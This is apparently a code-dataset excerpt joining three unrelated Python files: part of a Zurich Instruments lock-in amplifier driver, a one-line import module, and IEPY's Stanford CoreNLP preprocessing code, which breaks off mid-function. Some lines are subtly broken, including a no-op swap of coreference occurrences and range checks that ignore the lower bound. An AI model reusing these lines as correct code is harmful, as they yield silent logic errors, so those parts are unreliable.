self.add_parameter('scope_segments_count',
label='No. of segments returned by scope',
set_cmd=partial(self._setter, 'scopes', 0, 1,
'segments/count'),
get_cmd=partial(self._getter, 'scopes', 0, 1,
'segments/count'),
vals=vals.Ints(1, 32768),
get_parser=int
)
self.add_function('scope_reset_avg',
call_cmd=partial(self.scope.set,
'scopeModule/averager/restart', 1),
)
########################################
# THE SCOPE ITSELF
self.add_parameter('Scope',
parameter_class=Scope,
)
########################################
# SYSTEM PARAMETERS
self.add_parameter('external_clock_enabled',
set_cmd=partial(self.daq.setInt,
f"/{self.device}/system/extclk"),
get_cmd=partial(self.daq.getInt,
f"/{self.device}/system/extclk"),
val_mapping=create_on_off_val_mapping(),
docstring="Set the clock source to external 10 MHz reference clock."
)
self.add_parameter('jumbo_frames_enabled',
set_cmd=partial(self.daq.setInt,
f"/{self.device}/system/jumbo"),
get_cmd=partial(self.daq.getInt,
f"/{self.device}/system/jumbo"),
val_mapping=create_on_off_val_mapping(),
docstring="Enable jumbo frames on the TCP/IP interface"
)
def snapshot_base(self, update: Optional[bool] = True,
params_to_skip_update: Optional[Sequence[str]] = None
) -> Dict[Any, Any]:
""" Override the base method to ignore 'sweeper_sweeptime' if no signals selected."""
params_to_skip = []
if not self._sweeper_signals:
params_to_skip.append('sweeper_sweeptime')
if params_to_skip_update is not None:
params_to_skip += list(params_to_skip_update)
return super().snapshot_base(update=update,
params_to_skip_update=params_to_skip)
def _setter(self, module, number, mode, setting, value):
"""
General function to set/send settings to the device.
The module (e.g demodulator, input, output,..) number is counted in a
zero indexed fashion.
Args:
module (str): The module (eg. demodulator, input, output, ..)
to set.
number (int): Module's index
mode (int): Indicating whether we are asking for an int (0) or double (1)
setting (str): The module's setting to set.
value (int/double): The value to set.
"""
setstr = f'/{self.device}/{module}/{number}/{setting}'
if mode == 0:
self.daq.setInt(setstr, value)
if mode == 1:
self.daq.setDouble(setstr, value)
def _getter(self, module: str, number: int,
mode: int, setting: str) -> Union[float, int, str, Dict[Any, Any]]:
"""
General get function for generic parameters. Note that some parameters
use more specialised setter/getters.
The module (e.g demodulator, input, output,..) number is counted in a
zero indexed fashion.
Args:
module (str): The module (eg. demodulator, input, output, ..)
we want to know the value of.
number (int): Module's index
mode (int): Indicating whether we are asking for an int or double.
0: Int, 1: double, 2: Sample
setting (str): The module's setting to set.
returns:
inquered value
"""
querystr = f'/{self.device}/{module}/{number}/{setting}'
log.debug("getting %s", querystr)
if mode == 0:
value = self.daq.getInt(querystr)
elif mode == 1:
value = self.daq.getDouble(querystr)
elif mode == 2:
value = self.daq.getSample(querystr)
else:
raise RuntimeError("Invalid mode supplied")
# Weird exception, samplingrate returns a string
return value
def _get_demod_sample(self, number: int, demod_param: str) -> float:
log.debug("getting demod %s param %s", number, demod_param)
mode = 2
module = 'demods'
setting = 'sample'
if demod_param not in ['x', 'y', 'R', 'phi']:
raise RuntimeError("Invalid demodulator parameter")
datadict = cast(Dict[Any, Any], self._getter(module, number, mode, setting))
datadict['R'] = np.abs(datadict['x'] + 1j * datadict['y'])
datadict['phi'] = np.angle(datadict['x'] + 1j * datadict['y'], deg=True)
return datadict[demod_param]
def _sigout_setter(self, number: int,
mode: int,
setting: str,
value: Union[int, float],
output_mode: Optional[int] = None) -> None:
"""
Function to set signal output's settings. A specific setter function is
needed as parameters depend on each other and need to be checked and
updated accordingly.
Args:
number: The output channel to use. Either 1 or 2.
mode: Indicating whether we are asking for an int (0) or double (1).
setting: The module's setting to set.
value: The value to set the setting to.
output_mode: Some options may take an extra int to indicate which of the 8
demodulators this acts on
"""
# convenient reference
params = self.parameters
amp_val_dict = {'Vpk': lambda value: value,
'Vrms': lambda value: value * sqrt(2),
'dBm': lambda value: 10 ** ((value - 10) / 20)
}
def amp_valid(number, value):
ampdef_val = params[f"signal_output{number+1}_ampdef"].get()
autorange_val = params[f"signal_output{number+1}_autorange"].get()
if autorange_val == "ON":
imp50_val = params[f"signal_output{number + 1}_imp50"].get()
imp50_dic = {"OFF": 1.5, "ON": 0.75}
range_val = imp50_dic[imp50_val]
else:
so_range = params[f"signal_output{number+1}_range"].get()
range_val = round(so_range, 3)
converter = amp_val_dict[ampdef_val]
if -range_val < amp_val_dict[ampdef_val](value) > range_val:
raise ValueError('Signal Output:'
+ ' Amplitude {} {} too high for chosen range.'.format(value,
converter(value)))
def offset_valid(number, value):
def validate_against_individual(value, amp_val, range_val):
amp_val = round(amp_val, 3)
if -range_val < value + amp_val > range_val:
raise ValueError('Signal Output: Offset too high for '
'chosen range.')
range_val = params[f"signal_output{number+1}_range"].get()
range_val = round(range_val, 3)
if 'MF' in self.props['options']:
for i in range(1, 9):
amp_val = params[f"signal_output{number + 1}_amplitude{i}"].get()
validate_against_individual(value, amp_val, range_val)
else:
amp_val = params[f"signal_output{number + 1}_amplitude"].get()
validate_against_individual(value, amp_val, range_val)
def range_valid(number, value):
autorange_val = params[f"signal_output{number + 1}_autorange"].get()
imp50_val = params[f"signal_output{number+1}_imp50"].get()
imp50_dic = {"OFF": [1.5, 0.15], "ON": [0.75, 0.075]}
if autorange_val == "ON":
raise ValueError('Signal Output :'
' Cannot set range as autorange is turned on.')
if value not in imp50_dic[imp50_val]:
raise ValueError('Signal Output: Choose a valid range:'
'[0.75, 0.075] if imp50 is on, [1.5, 0.15]'
' otherwise.')
def ampdef_valid(number, value):
# check which amplitude definition you can use.
# dBm is only possible with 50 Ohm imp ON
imp50_val = params[f"signal_output{number+1}_imp50"].get()
imp50_ampdef_dict = {"ON": ["Vpk", "Vrms", "dBm"], "OFF": ["Vpk", "Vrms"]}
if value not in imp50_ampdef_dict[imp50_val]:
raise ValueError("Signal Output: Choose a valid amplitude "
"definition; ['Vpk','Vrms', 'dBm'] if imp50 is"
" on, ['Vpk','Vrms'] otherwise.")
dynamic_validation = {'range': range_valid,
'ampdef': ampdef_valid,
'amplitudes': amp_valid,
'offset': offset_valid}
def update_range_offset_amp():
range_val = params[f"signal_output{number+1}_range"].get()
offset_val = params[f"signal_output{number+1}_offset"].get()
if "MF" in self.props["options"]:
amps_val = [
params[f"signal_output{number + 1}_amplitude{output}"].get()
for output in range(1, 9)
]
else:
amps_val = [params['signal_output{}_amplitude'.format(
number + 1)].get()]
for amp_val in amps_val:
if -range_val < offset_val + amp_val > range_val:
# The GUI would allow higher values but it would clip the signal.
raise ValueError('Signal Output: Amplitude and/or '
'offset out of range.')
def update_offset():
self.parameters[f"signal_output{number+1}_offset"].get()
def update_amp():
if "MF" in self.props["options"]:
for i in range(1, 9):
self.parameters[f"signal_output{number+1}_amplitude{i}"].get()
else:
self.parameters[f"signal_output{number + 1}_amplitude"].get()
def update_range():
self.parameters[f"signal_output{number+1}_autorange"].get()
# parameters which will potentially change other parameters
changing_param = {'imp50': [update_range_offset_amp, update_range],
'autorange': [update_range],
'range': [update_offset, update_amp],
'amplitudes': [update_range, update_amp],
'offset': [update_range]
}
setstr = f'/{self.device}/sigouts/{number}/{setting}'
if output_mode is not None:
setstr += f'/{output_mode}'
if setting in dynamic_validation:
dynamic_validation[setting](number, value)
if mode == 0:
self.daq.setInt(setstr, value)
elif mode == 1:
self.daq.setDouble(setstr, value)
else:
raise RuntimeError("Invalid mode supplied")
if setting in changing_param:
[f() for f in changing_param[setting]]
def _sigout_getter(self, number: int, mode: int, setting: str,
output_mode: Optional[int] = None) -> Union[int, float]:
"""
Function to query the settings of signal outputs. Specific setter
function is needed as parameters depend on each other and need to be
checked and updated accordingly.
Args:
number:
mode: Indicating whether we are asking for an int (0) or double (1).
setting: The module's setting to set.
output_mode: Some options may take an extra int to indicate which
of the 8 demodulators this acts on
"""
querystr = f'/{self.device}/sigouts/{number}/{setting}'
if output_mode is not None:
querystr += f'/{output_mode}'
if mode == 0:
value = self.daq.getInt(querystr)
elif mode == 1:
value = self.daq.getDouble(querystr)
else:
raise RuntimeError("Invalid mode supplied")
return value
def _list_nodes(self, node):
"""
Returns a list with all nodes in the sub-tree below the specified node.
Args:
node (str): Module of which you want to know the parameters.
return:
list of sub-nodes
"""
node_list = self.daq.getList(f'/{self.device}/{node}/')
return node_list
@staticmethod
def NEPBW_to_timeconstant(NEPBW, order):
"""
Helper function to translate a NEP BW and a filter order
to a filter time constant. Meant to be used when calculating
sweeper sweep times.
Note: precise only to within a few percent.
Args:
NEPBW (float): The NEP bandwidth in Hz
order (int): The filter order
Returns:
float: The filter time constant in s.
"""
const = {1: 0.249, 2: 0.124, 3: 0.093, 4: 0.078, 5: 0.068,
6: 0.061, 7: 0.056, 8: 0.052}
tau_c = const[order]/NEPBW
return tau_c
def _get_sweep_time(self):
"""
get_cmd for the sweeper_sweeptime parameter.
Note: this calculation is only an estimate and not precise to more
than a few percent.
Returns:
Union[float, None]: None if the bandwidthcontrol setting is
'auto' (then all bets are off), otherwise a time in seconds.
Raises:
ValueError: if no signals are added to the sweep
"""
# Possible TODO: cut down on the number of instrument
# queries.
if self._sweeper_signals == []:
raise ValueError('No signals selected! Can not find sweep time.')
mode = self.sweeper_BWmode.get()
# The effective time constant of the demodulator depends on the
# sweeper/bandwidthcontrol setting.
#
# If this setting is 'current', the largest current
# time constant of the involved demodulators is used
#
# If the setting is 'fixed', the NEP BW specified under
# sweep/bandwidth is used. The filter order is needed to convert
# the NEP BW to a time constant
demods = {sig.split('/')[3] for sig in self._sweeper_signals}
rates = []
for demod in demods:
rates.append(self._getter('demods', demod, 1, 'rate'))
rate = min(rates)
if mode == 'current':
tcs = []
for demod in demods:
tcs.append(self._getter('demods', demod, 1, 'timeconstant'))
tau_c = max(tcs)
elif mode == 'fixed':
order = self.sweeper_order()
BW = self.sweeper_BW()
tau_c = self.NEPBW_to_timeconstant(BW, order)
elif mode == 'auto':
return None
settlingtime = max(self.sweeper_settlingtc.get()*tau_c,
self.sweeper_settlingtime.get())
averagingtime = max(self.sweeper_averaging_time.get()*tau_c*rate,
self.sweeper_averaging_samples.get())/rate
time_est = (settlingtime+averagingtime)*self.sweeper_samplecount.get()
return time_est
def _sweep_setter(self, setting, value):
"""
set_cmd for all sweeper parameters. The value and setting are saved in
a dictionary which is read by the Sweep parameter's build_sweep method
and only then sent to the instrument.
"""
key = '/'.join(setting.split('/')[1:])
self._sweepdict[key] = value
self.sweep_correctly_built = False
def _sweep_getter(self, setting):
"""
General get_cmd for sweeper parameters
The built-in sweeper.get command returns a dictionary, but we want
single values.
Args:
setting (str): the path used by ZI to describe the setting,
e.g. 'sweep/settling/time'
"""
# TODO: Should this look up in _sweepdict rather than query the
# instrument?
returndict = self.sweeper.get(setting) # this is a dict
# The dict may have different 'depths' depending on the parameter.
# The depth is encoded in the setting string (number of '/')
keys = setting.split('/')[1:]
while keys != []:
key = keys.pop(0)
returndict = returndict[key]
rawvalue = returndict
if isinstance(rawvalue, np.ndarray) and len(rawvalue) == 1:
value = rawvalue[0]
elif isinstance(rawvalue, list) and len(rawvalue) == 1:
value = rawvalue[0]
else:
value = rawvalue
return value
def add_signal_to_sweeper(self, demodulator, attribute):
"""
Add a signal to the output of the sweeper. When the sweeper sweeps,
the signals added to the sweeper are returned.
Args:
demodulator (int): A number from 1-8 choosing the demodulator.
The same demodulator can be chosen several times for
different attributes, e.g. demod1 X, demod1 phase
attribute (str): The attribute to record, e.g. phase or Y
Raises:
ValueError: if a demodulator outside the allowed range is
selected
ValueError: if an attribute not in the list of allowed attributes
is selected
"""
# TODO: implement all possibly returned attributes
valid_attributes = ['X', 'Y', 'R', 'phase', 'Xrms', 'Yrms', 'Rrms']
# Validation
if demodulator not in range(1, 9):
raise ValueError('Can not select demodulator' +
f' {demodulator}. Only ' +
'demodulators 1-8 are available.')
if attribute not in valid_attributes:
raise ValueError('Can not select attribute:'+
'{}. Only the following attributes are' +
' available: ' +
('{}, '*len(valid_attributes)).format(*valid_attributes))
# internally, we use strings very similar to the ones used by the
# instrument, but with the attribute added, e.g.
# '/dev2189/demods/0/sample/X' means X of demodulator 1.
signalstring = ('/' + self.device +
'/demods/{}/sample/{}'.format(demodulator-1,
attribute))
if signalstring not in self._sweeper_signals:
self._sweeper_signals.append(signalstring)
def remove_signal_from_sweeper(self, demodulator, attribute):
"""
Remove a signal from the output of the sweeper. If the signal
has not previously been added, a warning is logged.
Args:
demodulator (int): A number from 1-8 choosing the demodulator.
The same demodulator can be chosen several times for
different attributes, e.g. demod1 X, demod1 phase
attribute (str): The attribute to record, e.g. phase or Y
"""
signalstring = ('/' + self.device +
'/demods/{}/sample/{}'.format(demodulator-1,
attribute))
if signalstring not in self._sweeper_signals:
log.warning(f'Can not remove signal with {attribute} of' +
f' demodulator {demodulator}, since it was' +
' not previously added.')
else:
self._sweeper_signals.remove(signalstring)
def print_sweeper_settings(self):
"""
Pretty-print the current settings of the sweeper.
If Sweep.build_sweep and Sweep.get are called, the sweep described
here will be performed.
"""
print('ACQUISITION')
toprint = ['sweeper_BWmode', 'sweeper_BW', 'sweeper_order',
'sweeper_averaging_samples', 'sweeper_averaging_time',
'sweeper_settlingtime', 'sweeper_settlingtc']
for paramname in toprint:
parameter = self.parameters[paramname]
print(' {}: {} ({})'.format(parameter.label, parameter.get(),
parameter.unit))
print('HORISONTAL')
toprint = ['sweeper_start', 'sweeper_stop',
'sweeper_units',
'sweeper_samplecount',
'sweeper_param', 'sweeper_mode',
'sweeper_timeout']
for paramname in toprint:
parameter = self.parameters[paramname]
print(f' {parameter.label}: {parameter.get()}')
print('VERTICAL')
count = 1
for signal in self._sweeper_signals:
(_, _, _, dm, _, attr) = signal.split('/')
fmt = (count, int(dm)+1, attr)
print(' Signal {}: Demodulator {}: {}'.format(*fmt))
count += 1
features = ['timeconstant', 'order', 'samplerate']
print('DEMODULATORS')
demods = []
for signal in self._sweeper_signals:
demods.append(int(signal.split('/')[3]))
demods = set(demods)
for dm in demods:
for feat in features:
parameter = self.parameters[f"demod{dm+1:d}_{feat}"]
fmt = (dm + 1, parameter.label, parameter.get(), parameter.unit)
print(" Demodulator {}: {}: {:.6f} ({})".format(*fmt))
print("META")
swptime = self.sweeper_sweeptime()
if swptime is not None:
print(f' Expected sweep time: {swptime:.1f} (s)')
else:
print(' Expected sweep time: N/A in auto mode')
print(' Sweep timeout: {} ({})'.format(self.sweeper_timeout.get(),
's'))
ready = self.sweep_correctly_built
print(f' Sweep built and ready to execute: {ready}')
def _scope_setter(self, scopemodule, mode, setting, value):
"""
set_cmd for all scope parameters. The value and setting are saved in
a dictionary which is read by the Scope parameter's build_scope method
and only then sent to the instrument.
Args:
scopemodule (int): Indicates whether this is a setting of the
scopeModule or not. 1: it is a scopeModule setting,
0: it is not.
mode (int): Indicates whether we are setting an int or a float.
0: int, 1: float. NOTE: Ignored if scopemodule==1.
setting (str): The setting, e.g. 'length'.
value (Union[int, float, str]): The value to set.
"""
# Because setpoints need to be built
self.scope_correctly_built = False
# Some parameters are linked to each other in specific ways
# Therefore, we need special actions for setting these parameters
SRtranslation = {'kHz': 1e3, 'MHz': 1e6, 'GHz': 1e9,
'khz': 1e3, 'Mhz': 1e6, 'Ghz': 1e9}
def setlength(value):
# TODO: add validation. The GUI seems to correect this value
self.daq.setDouble(f'/{self.device}/scopes/0/length',
value)
SR_str = self.parameters['scope_samplingrate'].get()
(number, unit) = SR_str.split(' ')
SR = float(number)*SRtranslation[unit]
self.parameters['scope_duration'].cache.set(value/SR)
self.daq.setInt(f'/{self.device}/scopes/0/length', value)
def setduration(value):
# TODO: validation?
SR_str = self.parameters['scope_samplingrate'].get()
(number, unit) = SR_str.split(' ')
SR = float(number)*SRtranslation[unit]
N = int(np.round(value*SR))
self.parameters['scope_length'].cache.set(N)
self.parameters['scope_duration'].cache.set(value)
self.daq.setInt(f'/{self.device}/scopes/0/length', N)
def setholdoffseconds(value):
self.parameters['scope_trig_holdoffmode'].set('s')
self.daq.setDouble(f'/{self.device}/scopes/0/trigholdoff',
value)
def setsamplingrate(value):
# When the sample rate is changed, the number of points of the trace
# remains unchanged and the duration changes accordingly
newSR_str = dict(zip(self._samplingrate_codes.values(),
self._samplingrate_codes.keys()))[value]
(number, unit) = newSR_str.split(' ')
newSR = float(number)*SRtranslation[unit]
oldSR_str = self.parameters['scope_samplingrate'].get()
(number, unit) = oldSR_str.split(' ')
oldSR = float(number)*SRtranslation[unit]
oldduration = self.parameters['scope_duration'].get()
newduration = oldduration*oldSR/newSR
self.parameters['scope_duration'].cache.set(newduration)
self.daq.setInt(f'/{self.device}/scopes/0/time', value)
specialcases = {'length': setlength,
'duration': setduration,
'scope_trig_holdoffseconds': setholdoffseconds,
'time': setsamplingrate}
if setting in specialcases:
specialcases[setting](value)
self.daq.sync()
return
else:
# We have two different parameter types: those under
# /scopes/0/ and those under scopeModule/
if scopemodule:
self.scope.set(f'scopeModule/{setting}', value)
elif mode == 0:
self.daq.setInt('/{}/scopes/0/{}'.format(self.device,
setting), value)
elif mode == 1:
self.daq.setDouble('/{}/scopes/0/{}'.format(self.device,
setting), value)
return
def _scope_getter(self, setting):
"""
get_cmd for scopeModule parameters
"""
# There are a few special cases
SRtranslation = {'kHz': 1e3, 'MHz': 1e6, 'GHz': 1e9,
'khz': 1e3, 'Mhz': 1e6, 'Ghz': 1e9}
def getduration():
SR_str = self.parameters['scope_samplingrate'].get()
(number, unit) = SR_str.split(' ')
SR = float(number)*SRtranslation[unit]
N = self.parameters['scope_length'].get()
duration = N/SR
return duration
specialcases = {'duration': getduration}
if setting in specialcases:
value = specialcases[setting]()
else:
querystr = 'scopeModule/' + setting
returndict = self.scope.get(querystr)
# The dict may have different 'depths' depending on the parameter.
# The depth is encoded in the setting string (number of '/')
keys = setting.split('/')
while keys != []:
key = keys.pop(0)
returndict = returndict[key]
rawvalue = returndict
if isinstance(rawvalue, np.ndarray) and len(rawvalue) == 1:
value = rawvalue[0]
elif isinstance(rawvalue, list) and len(rawvalue) == 1:
value = rawvalue[0]
else:
value = rawvalue
return value
@staticmethod
def _convert_to_float(frequency):
converter = {'hz': 'e0', 'khz': 'e3', 'mhz': 'e6', 'ghz': 'e9',
'thz': 'e12'}
value, suffix = frequency.split(' ')
return float(''.join([value, converter[suffix.lower()]]))
def round_to_nearest_sampling_frequency(self, desired_sampling_rate):
available_frequencies = [1.8e9 / 2 ** self._samplingrate_codes[freq]
for freq in self._samplingrate_codes.keys()]
nearest_frequency = min(available_frequencies, key=lambda f: abs(
math.log(desired_sampling_rate, 2) - math.log(f, 2)))
return nearest_frequency
def _set_samplingrate_as_float(self, frequency):
float_samplingrate_map = {1.8e9 / 2 ** v: k
for k, v in self._samplingrate_codes.items()}
frequency_as_string = float_samplingrate_map[frequency]
self.scope_samplingrate(frequency_as_string)
def _get_samplingrate_as_float(self):
frequency = self.scope_samplingrate()
correct_frequency = 1.8e9 / 2 ** self._samplingrate_codes[frequency]
return correct_frequency
def close(self):
"""
Override of the base class' close function
"""
self.scope.unsubscribe(f'/{self.device}/scopes/0/wave')
self.scope.clear()
self.sweeper.clear()
self.daq.disconnect()
super().close()
|
api/__init__.py
|
bnbwebexpertise/linkr
| 124 |
69365
|
# flake8: noqa: F401
from auth import *
from link import *
from misc import *
from user import *
|
iepy/preprocess/stanford_preprocess.py
|
francolq/iepy
| 813 |
69376
|
<reponame>francolq/iepy<gh_stars>100-1000
from collections import defaultdict
from itertools import chain, groupby
import logging
import tempfile
from iepy.preprocess import corenlp
from iepy.preprocess.pipeline import BasePreProcessStepRunner, PreProcessSteps
from iepy.preprocess.ner.base import FoundEntity
from iepy.data.models import EntityOccurrence, GazetteItem
logger = logging.getLogger(__name__)
class CoreferenceError(Exception):
pass
class GazetteManager:
_PREFIX = "__GAZETTE_"
# Stanford NER default/native classes
NATIVE_CLASSES = [
'DATE', 'DURATION', 'LOCATION', 'MISC',
'MONEY', 'NUMBER', 'ORDINAL', 'ORGANIZATION',
'PERCENT', 'PERSON', 'SET', 'TIME',
]
def __init__(self):
self.gazette_items = list(GazetteItem.objects.all())
self._cache_per_kind = defaultdict(list)
def escape_text(self, text):
text = " ".join("\Q{}\E".format(x) for x in text.split())
return text
def strip_kind(self, prefixed_kind):
return prefixed_kind.split(self._PREFIX, 1)[-1]
def was_entry_created_by_gazette(self, alias, kind):
if kind.startswith(self._PREFIX):
return True
return alias in self._cache_per_kind[kind]
def generate_stanford_gazettes_file(self):
"""
Generates the gazettes file if there's any. Returns
the filepath in case gazette items where found, else None.
Note: the Stanford Coreference annotator, only handles Entities of their
native classes. That's why there's some special management of Gazette items
of such classes/kinds.
As a side effect, populates the internal cache with the gazette-items
that will be passed to Stanford with any of their Native classes (Entity Kinds)
"""
if not self.gazette_items:
return
overridable_classes = ",".join(self.NATIVE_CLASSES)
self._cache_per_kind = defaultdict(list)
gazette_format = "{}\t{}\t{}\n"
_, filepath = tempfile.mkstemp()
with open(filepath, "w") as gazette_file:
for gazette in self.gazette_items:
kname = gazette.kind.name
if kname in self.NATIVE_CLASSES:
# kind will not be escaped, but tokens will be stored on cache
self._cache_per_kind[kname].append(gazette.text)
else:
kname = "{}{}".format(self._PREFIX, kname)
text = self.escape_text(gazette.text)
line = gazette_format.format(text, kname, overridable_classes)
gazette_file.write(line)
return filepath
class StanfordPreprocess(BasePreProcessStepRunner):
def __init__(self, increment_ner=False):
super().__init__()
self.gazette_manager = GazetteManager()
gazettes_filepath = self.gazette_manager.generate_stanford_gazettes_file()
self.corenlp = corenlp.get_analizer(gazettes_filepath=gazettes_filepath)
self.override = False
self.increment_ner = increment_ner
def lemmatization_only(self, document):
""" Run only the lemmatization """
# Lemmatization was added after the first so we need to support
# that a document has all the steps done but lemmatization
analysis = StanfordAnalysis(self.corenlp.analyse(document.text))
tokens = analysis.get_tokens()
if document.tokens != tokens:
raise ValueError(
"Document changed since last tokenization, "
"can't add lemmas to it"
)
document.set_lemmatization_result(analysis.get_lemmas())
document.save()
def syntactic_parsing_only(self, document):
""" Run only the syntactic parsing """
# syntactic parsing was added after the first release, so we need to
# provide the ability of doing just this on documents that
# have all the steps done but syntactic parsing
analysis = StanfordAnalysis(self.corenlp.analyse(document.text))
parse_trees = analysis.get_parse_trees()
document.set_syntactic_parsing_result(parse_trees)
document.save()
def increment_ner_only(self, document):
"""
Runs NER steps (basic NER and also Gazetter), adding the new found NE.
"""
analysis = StanfordAnalysis(self.corenlp.analyse(document.text))
# NER
found_entities = analysis.get_found_entities(
document.human_identifier, self.gazette_manager
)
document.set_ner_result(found_entities)
# Save progress so far, next step doesn't modify `document`
document.save()
# Coreference resolution
for coref in analysis.get_coreferences():
try:
apply_coreferences(document, coref)
except CoreferenceError as e:
logger.warning(e)
def __call__(self, document):
"""Checks state of the document, and based on the preprocess options,
# decides what needs to be run, and triggers it.
"""
steps = [
PreProcessSteps.tokenization,
PreProcessSteps.sentencer,
PreProcessSteps.tagging,
PreProcessSteps.ner,
# Steps added after 0.9.1
PreProcessSteps.lemmatization,
# Steps added after 0.9.2
PreProcessSteps.syntactic_parsing,
]
steps_done = set([s for s in steps if document.was_preprocess_step_done(s)])
if self.override or not steps_done:
# no matter what's the internal state of the document, or any other option
# on the StanfordPreprocess, everything need to be run
self.run_everything(document)
elif steps_done == set(steps):
# All steps are already done...
if self.increment_ner:
self.increment_ner_only(document)
else:
# Dealing with accepting "incremental-running" of preprocess for documents
# that were preprocessed with some older version of IEPY.
# "initial_steps" are the ones added up to version 0.9.1, which (at some point)
# were considered "all available steps".
initial_steps = steps[:4]
all_initials_done = set(initial_steps).issubset(steps_done)
if all_initials_done:
if PreProcessSteps.lemmatization not in steps_done:
self.lemmatization_only(document)
if PreProcessSteps.syntactic_parsing not in steps_done:
self.syntactic_parsing_only(document)
else:
# weird combination of steps done. We can't handle that right now
raise NotImplementedError(
"Running with mixed preprocess steps not supported, "
"must be 100% StanfordMultiStepRunner"
)
def run_everything(self, document):
analysis = StanfordAnalysis(self.corenlp.analyse(document.text))
# Tokenization
tokens = analysis.get_tokens()
offsets = analysis.get_token_offsets()
document.set_tokenization_result(list(zip(offsets, tokens)))
# Lemmatization
document.set_lemmatization_result(analysis.get_lemmas())
# "Sentencing" (splitting in sentences)
document.set_sentencer_result(analysis.get_sentence_boundaries())
# POS tagging
document.set_tagging_result(analysis.get_pos())
# Syntactic parsing
document.set_syntactic_parsing_result(analysis.get_parse_trees())
# NER
found_entities = analysis.get_found_entities(
document.human_identifier, self.gazette_manager
)
document.set_ner_result(found_entities)
# Save progress so far, next step doesn't modify `document`
document.save()
# Coreference resolution
for coref in analysis.get_coreferences():
try:
apply_coreferences(document, coref)
except CoreferenceError as e:
logger.warning(e)
def _dict_path(d, *steps):
"""Traverses throuth a dict of dicts.
Returns always a list. If the object to return is not a list,
it's encapsulated in one.
If any of the path steps does not exist, an empty list is returned.
"""
x = d
for key in steps:
try:
x = x[key]
except KeyError:
return []
if not isinstance(x, list):
x = [x]
return x
class StanfordAnalysis:
"""Helper for extracting the information from stanford corenlp output"""
def __init__(self, data):
self._data = data
self.sentences = self.get_sentences()
self._raw_tokens = list(chain.from_iterable(self.sentences))
def _get(self, *args):
return _dict_path(self._data, *args)
def get_sentences(self):
result = []
raw_sentences = self._get("sentences", "sentence")
for sentence in raw_sentences:
xs = []
tokens = _dict_path(sentence, "tokens", "token")
for t in tokens:
xs.append(t)
result.append(xs)
return result
def get_sentence_boundaries(self):
"""
Returns a list with the offsets in tokens where each sentence starts, in
order. The list contains one extra element at the end containing the total
number of tokens.
"""
ys = [0]
for x in self.sentences:
y = ys[-1] + len(x)
ys.append(y)
return ys
def get_parse_trees(self):
result = [x["parse"] for x in self._get("sentences", "sentence")]
return result
def get_tokens(self):
return [x["word"] for x in self._raw_tokens]
def get_lemmas(self):
return [x["lemma"] for x in self._raw_tokens]
def get_token_offsets(self):
return [int(x["CharacterOffsetBegin"]) for x in self._raw_tokens]
def get_pos(self):
return [x["POS"] for x in self._raw_tokens]
def get_found_entities(self, entity_key_prefix, gazette_manager=None):
"""
Generates FoundEntity objects for the entities found.
For all the entities that came from a gazette, joins
the ones with the same kind.
"""
found_entities = []
tokens = self.get_tokens()
for i, j, kind in self.get_entity_occurrences():
alias = " ".join(tokens[i:j])
if gazette_manager is not None:
from_gazette = gazette_manager.was_entry_created_by_gazette(alias, kind)
else:
from_gazette = False
if from_gazette:
kind = gazette_manager.strip_kind(kind)
key = alias
else:
key = "{} {} {} {}".format(entity_key_prefix, kind, i, j)
found_entities.append(FoundEntity(
key=key,
kind_name=kind,
alias=alias,
offset=i,
offset_end=j,
from_gazette=from_gazette
))
return found_entities
def get_entity_occurrences(self):
"""
Returns a list of tuples (i, j, kind) such that `i` is the start
offset of an entity occurrence, `j` is the end offset and `kind` is the
entity kind of the entity.
"""
found_entities = []
offset = 0
for words in self.sentences:
for kind, group in groupby(enumerate(words), key=lambda x: x[1]["NER"]):
if kind == "O":
continue
ix = [i for i, word in group]
i = ix[0] + offset
j = ix[-1] + 1 + offset
found_entities.append((i, j, kind))
offset += len(words)
return found_entities
def get_coreferences(self):
"""
Returns a list of lists of tuples (i, j, k) such that `i` is the start
offset of a reference, `j` is the end offset and `k` is the index of the
head word within the reference.
All offsets are in tokens and relative to the start of the document.
All references within the same list refer to the same entity.
All references in different lists refer to different entities.
"""
sentence_offsets = self.get_sentence_boundaries()
coreferences = []
for mention in self._get("coreference", "coreference"):
occurrences = []
representative = 0
for r, occurrence in enumerate(_dict_path(mention, "mention")):
if "@representative" in occurrence:
representative = r
sentence = int(occurrence["sentence"]) - 1
offset = sentence_offsets[sentence]
i = int(occurrence["start"]) - 1 + offset
j = int(occurrence["end"]) - 1 + offset
k = int(occurrence["head"]) - 1 + offset
occurrences.append((i, j, k))
# Occurrences' representative goes in the first position
k = representative
occurrences[0], occurrences[k] = occurrences[0], occurrences[k]
coreferences.append(occurrences)
return coreferences
def issues_merging_entities(document, entities):
# Checks is some general preconditions are met before proceeding to merge some
# entities on a fiven document
kinds = set(e.kind for e in entities)
if len(kinds) != 1:
return "Cannot merge entities of different kinds {!r}".format(kinds)
gazettes = set(e.gazette for e in entities if e.gazette)
if len(gazettes) > 1:
return "Cannot merge entities of different gazette items {!r}".format(gazettes)
def apply_coreferences(document, coreferences):
"""
Makes all entity ocurrences listed in `coreferences` have the same
entity.
It uses coreference information to merge entity ocurrence's
entities into a single entity.
`correferences` is a list of tuples (i, j, head) where:
- `i` is the offset in tokens where the occurrence starts.
- `j` is the offset in tokens where the occurrence ends.
- `head` is the index in tokens of the head of the occurrence (the "most
important word").
Every entity occurrence in `coreference` might already exist or not in
`document`. If no occurrence exists in `document` then nothing is done.
If at least one ocurrence exists in `document` then all other ocurrences
named in `coreference` are automatically created.
This function can raise CofererenceError in case a merge is attempted on
entities of different kinds.
"""
# For each token index make a list of the occurrences there
occurrences = defaultdict(list)
for occurrence in document.entity_occurrences.all():
for i in range(occurrence.offset, occurrence.offset_end):
occurrences[i].append(occurrence)
entities = [] # Existing entities referenced by correferences
pickable_as_representant = []
missing = [] # References that have no entity occurrence yet
for i, j, head in sorted(coreferences):
if occurrences[head]:
for x in occurrences[head]:
entities.append(x.entity)
if not x.anaphora:
pickable_as_representant.append(x.entity)
else:
missing.append((i, j, head))
if not pickable_as_representant:
return
issues = issues_merging_entities(document, entities)
if issues:
raise CoreferenceError(issues)
from_ner = [r for r in pickable_as_representant if not r.gazette]
if from_ner:
canonical = from_ner[0]
else:
canonical = pickable_as_representant[0]
# Each missing coreference needs to be created into an occurrence now
for i, j, head in missing:
if j - i >= 5: # If the entity is a long phrase then just keep one token
i = head
j = head + 1
EntityOccurrence.objects.get_or_create(
document=document,
entity=canonical,
offset=i,
offset_end=j,
alias=" ".join(document.tokens[i:j]),
defaults={'anaphora': True})
# Finally, the merging 'per se', where all things are entity occurrences
for entity in set(x for x in entities if x != canonical):
